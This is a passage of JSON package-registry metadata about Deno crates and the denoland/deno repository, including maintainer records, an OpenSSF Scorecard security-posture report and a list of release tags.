ackages/deno_node_sqlite/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-03-04T18:06:12.114Z","updated_at":"2026-03-04T18:06:12.114Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-12T15:17:55.158Z","updated_at":"2026-02-12T15:17:55.158Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047952,"name":"deno-x86_64-pc-windows-msvc","ecosystem":"cargo","description":"Binary dependencies for the 'deno' crate","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":31,"first_release_published_at":"2019-03-31T19:51:56.257Z","latest_release_published_at":"2019-11-05T00:59:54.916Z","latest_release_number":"0.23.0","last_synced_at":"2026-09-07T22:59:41.881Z","created_at":"2022-04-12T10:03:05.856Z","updated_at":"2026-09-08T07:14:03.816Z","registry_url":"https://crates.io/crates/deno-x86_64-pc-windows-msvc/","install_command":"cargo install deno-x86_64-pc-windows-msvc","documentation_url":"https://docs.rs/deno-x86_64-pc-windows-msvc/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.